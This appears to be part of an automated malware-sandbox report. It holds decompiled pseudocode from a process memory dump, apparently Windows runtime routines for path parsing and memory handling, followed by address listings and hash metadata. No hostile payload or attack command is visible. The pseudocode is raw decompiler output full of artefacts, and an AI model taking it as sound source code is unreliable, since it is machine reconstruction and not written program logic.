														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04A8F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04A8F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04A8F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04A8FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04A8FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04A8F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04A8F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04B14CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04A9D130(_t427, _t494, _t511);
				}
			}

0x04b15ba5
0x04b15baa
0x04b15baf
0x04b15bb4
0x04b15bb6
0x04b15bbc
0x04b15bbe
0x04b15bc4
0x04b15bcd
0x04b15bd3
0x04b15bd6
0x04b15bdc
0x04b15be0
0x04b15be3
0x04b15beb
0x04b15bf2
0x04b15bf8
0x04b15bfe
0x04b15c04
0x04b15c0e
0x04b15c18
0x04b15c1f
0x04b15c25
0x04b15c2a
0x04b15c2c
0x04b15c32
0x04b15c3a
0x04b15c3f
0x04b15c42
0x04b15c48
0x04b15c5b
0x04b15c5b
0x04b15c2c
0x04b15cb7
0x04b15cb9
0x04b15cbf
0x04b15cc2
0x04b15cca
0x04b15ccb
0x04b15ccb
0x04b15cd1
0x04b15cd7
0x04b15cda
0x04b15ce1
0x04b15ce4
0x04b15ce7
0x04b15ced
0x04b15cf3
0x04b15cf9
0x04b15cff
0x04b15d08
0x04b15d0a
0x04b15d0e
0x04b15d10
0x00000000
0x00000000
0x04b15d16
0x04b15d1a
0x00000000
0x00000000
0x04b15d20
0x04b15d22
0x04b15d25
0x04b15d2f
0x04b15d2f
0x04b15d33
0x04b15d3d
0x04b15d49
0x04b15d4b
0x00000000
0x00000000
0x04b15d5a
0x04b15d5d
0x04b15d60
0x00000000
0x00000000
0x04b15d66
0x04b15d69
0x00000000
0x00000000
0x04b15d6f
0x04b15d6f
0x04b15d73
0x04b15d79
0x04b15d7f
0x04b15d86
0x04b15d95
0x04b15d98
0x04b15dba
0x04b15dcb
0x04b15dce
0x04b15dd3
0x04b15dd6
0x04b15dd8
0x04b15de6
0x04b15dec
0x04b15dee
0x04b15df1
0x04b15df3
0x04b1635a
0x04b1635a
0x00000000
0x04b1635a
0x04b15dfe
0x04b15e02
0x04b15e05
0x04b15e07
0x04b15e10
0x04b15e13
0x04b15e1b
0x04b15e1c
0x04b15e21
0x04b15e22
0x04b15e23
0x04b15e25
0x04b15e2a
0x04b15e2c
0x04b15e2e
0x04b15e36
0x04b15e39
0x04b15e42
0x04b15e47
0x04b15e4d
0x04b15e54
0x04b15e54
0x04b15e54
0x04b15e2e
0x04b15e5c
0x04b15e5f
0x04b15e62
0x04b15e64
0x04b15e6b
0x04b15e70
0x04b15e7a
0x04b15e7a
0x04b15e7a
0x04b15e6b
0x04b15e7e
0x04b15e7f
0x04b15e7f
0x04b15e81
0x04b15e87
0x04b15e8b
0x04b15e8c
0x04b15e8c
0x04b15e8c
0x04b15e9a
0x04b15e9c
0x04b15ea2
0x04b15ea6
0x04b15f50
0x04b15f50
0x04b15f57
0x04b15f66
0x04b15f66
0x04b15f66
0x04b15f68
0x04b15f6a
0x04b163d0
0x00000000
0x04b15f70
0x04b15f70
0x04b15f91
0x04b15f9c
0x04b15f9e
0x04b15fa4
0x04b15fa6
0x04b1638c
0x04b16392
0x04b163a1
0x04b163a7
0x04b163af
0x04b163af
0x04b163bd
0x04b163d8
0x00000000
0x04b163d8
0x04b15fac
0x04b15fb2
0x04b15fb4
0x04b15fbd
0x04b15fc6
0x04b15fce
0x04b15fd4
0x04b15fdc
0x04b15fec
0x04b15fed
0x04b15fee
0x04b15fef
0x04b15ff9
0x04b15ffa
0x04b15ffb
0x04b15ffc
0x04b16000
0x04b16004
0x04b16012
0x04b16012
0x04b16018
0x04b16019
0x04b1601a
0x04b1601b
0x04b1601c
0x04b16020
0x04b16059
0x04b1605c
0x04b16061
0x04b16061
0x04b16022
0x04b16022
0x04b16022
0x04b16025
0x04b1602a
0x04b1602b
0x04b16031
0x04b16037
0x04b16038
0x04b1603e
0x04b16048
0x04b16049
0x04b1604a
0x04b1604b
0x04b1604c
0x04b1604d
0x04b16053
0x04b16054
0x04b16054
0x04b16062
0x04b16065
0x04b16067
0x04b1606a
0x04b16070
0x04b16075
0x04b16076
0x04b16081
0x04b16087
0x04b16095
0x04b16099
0x04b1609e
0x04b160a4
0x04b160ae
0x04b160b0
0x04b160b3
0x04b160b6
0x04b160b8
0x04b160ba
0x04b160ba
0x04b160ba
0x04b160ba
0x04b160be
0x04b160c0
0x04b160c5
0x04b160c5
0x04b160c5
0x04b160c6
0x04b160cd
0x04b16114
0x04b160cf
0x04b160cf
0x04b160d4
0x04b160d5
0x04b160da
0x04b160db
0x04b160e1
0x04b160e2
0x04b160e8
0x04b160f8
0x04b160fd
0x04b160fe
0x04b16102
0x04b16104
0x04b16107
0x04b16109
0x04b1610b
0x04b1610b
0x04b1610b
0x04b1610b
0x04b1610f
0x04b1610f
0x04b16117
0x04b1611a
0x04b1611f
0x04b16125
0x04b16134
0x04b16139
0x04b1613f
0x04b16146
0x04b16148
0x04b1614b
0x04b1614d
0x04b1614f
0x04b1614f
0x04b1614f
0x04b1614f
0x04b16153
0x04b16159
0x04b16159
0x04b1615c
0x04b16163
0x04b16169
0x04b1616c
0x04b16172
0x04b16181
0x04b16186
0x04b16187
0x04b1618b
0x04b16191
0x04b16195
0x04b161a3
0x04b161bb
0x04b161c0
0x04b161c3
0x04b161cc
0x04b161d0
0x04b161dc
0x04b161de
0x04b161e1
0x04b161e4
0x04b161e6
0x04b161e8
0x04b161e8
0x04b161e8
0x04b161e8
0x04b161e6
0x04b161ec
0x04b161f3
0x04b16203
0x04b16209
0x04b1620a
0x04b16216
0x04b1621d
0x04b16227
0x04b16241
0x04b16246
0x04b1624c
0x04b16257
0x04b16259
0x04b1625c
0x04b1625e
0x04b16260
0x04b16260
0x04b16260
0x04b16260
0x04b1625e
0x04b16264
0x04b16267
0x04b16269
0x04b16315
0x04b16315
0x04b1631b
0x04b1631e
0x04b16324
0x04b16327
0x04b1632f
0x04b16330
0x04b16333
0x04b1633a
0x04b1633c
0x04b16335
0x04b16335
0x04b16335
0x04b1633f
0x04b16342
0x04b1634c
0x04b16352
0x04b16355
0x04b16355
0x04b16359
0x00000000
0x04b1626f
0x04b16275
0x04b16275
0x04b16278
0x04b1627e
0x04b1627e
0x04b16281
0x04b16287
0x04b1628d
0x04b16298
0x04b1629c
0x04b162a2
0x04b1629e
0x04b1629e
0x04b1629e
0x04b162a7
0x04b162a7
0x04b162aa
0x04b162b0
0x04b162f0
0x04b162f0
0x04b162f2
0x04b162f8
0x04b162fd
0x04b162b2
0x04b162b2
0x04b162b2
0x04b162b5
0x04b162dd
0x04b162e2
0x04b162e5
0x04b162b7
0x04b162b8
0x04b162bb
0x04b162bd
0x04b162c0
0x04b162c4
0x04b162cd
0x04b162cd
0x04b162c0
0x04b162bb
0x04b162b5
0x04b16302
0x04b16303
0x04b16305
0x04b16305
0x04b16305
0x04b1630c
0x04b1630c
0x00000000
0x04b1627e
0x04b16269
0x04b15eac
0x04b15ebb
0x04b15ebe
0x04b15ecb
0x04b15ecb
0x04b15ece
0x04b15ece
0x04b15ed4
0x04b15ed7
0x04b15ed9
0x04b15edb
0x04b15edb
0x04b15ee1
0x04b15ee1
0x04b15ee3
0x04b15f20
0x04b15f20
0x04b15ee5
0x04b15ee5
0x04b15ee5
0x04b15ee8
0x04b15f11
0x04b15f18
0x04b15eea
0x04b15eea
0x04b15eed
0x04b15ef2
0x04b15ef8
0x04b15efb
0x04b15f0a
0x04b15f0a
0x04b15eed
0x04b15ee8
0x04b15f22
0x04b15f28
0x00000000
0x00000000
0x04b15f30
0x04b15f31
0x04b15f37
0x04b15f3a
0x04b15f3d
0x04b15f44
0x00000000
0x00000000
0x00000000
0x04b15f46
0x04b15f48
0x04b15f4d
0x00000000
0x04b15f4d
0x04b15dda
0x04b15ddf
0x00000000
0x04b15ddf
0x04b15dd8
0x04b15da7
0x04b15da9
0x04b15dac
0x04b15dae
0x00000000
0x04b15db4
0x04b15db4
0x00000000
0x04b15db4
0x04b15dae
0x04b15d88
0x04b15d8d
0x04b16363
0x04b16369
0x04b1636a
0x04b16370
0x04b16372
0x04b1637a
0x04b1637b
0x04b1637d
0x00000000
0x00000000
0x04b1637f
0x04b16385
0x00000000
0x04b16385
0x04b15d38
0x04b15d3b
0x00000000
0x00000000
0x00000000
0x04b15d3b
0x04b15d27
0x04b15d29
0x00000000
0x00000000
0x00000000
0x04b16360
0x00000000
0x04b16360
0x04b15c10
0x04b15c10
0x04b163da
0x04b163e5
0x04b163e5

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b498dd3187cfa83423f2c02e556c39ab587dd4ec76e7c4cb13b2cc1a8d726ecf
Instruction ID: be570adb3b1271e491f80478e318b5c6aa47d968a050272684144e3c053b0a0d
Opcode Fuzzy Hash: b498dd3187cfa83423f2c02e556c39ab587dd4ec76e7c4cb13b2cc1a8d726ecf
Instruction Fuzzy Hash: A4424975A00229DFDB24CF68C980BA9B7B1FF45304F5481EAD84DEB252E734AA85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04A64120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04A64120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4b3d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04A7F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04A66E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04A64620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04A66E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04A645F8))) {
												case 0:
													_v568 = 0x4a21078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4a211c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04A64620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04A8F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04A8F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04A452A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04A5EB70(1, 0x4b379a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04A5AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
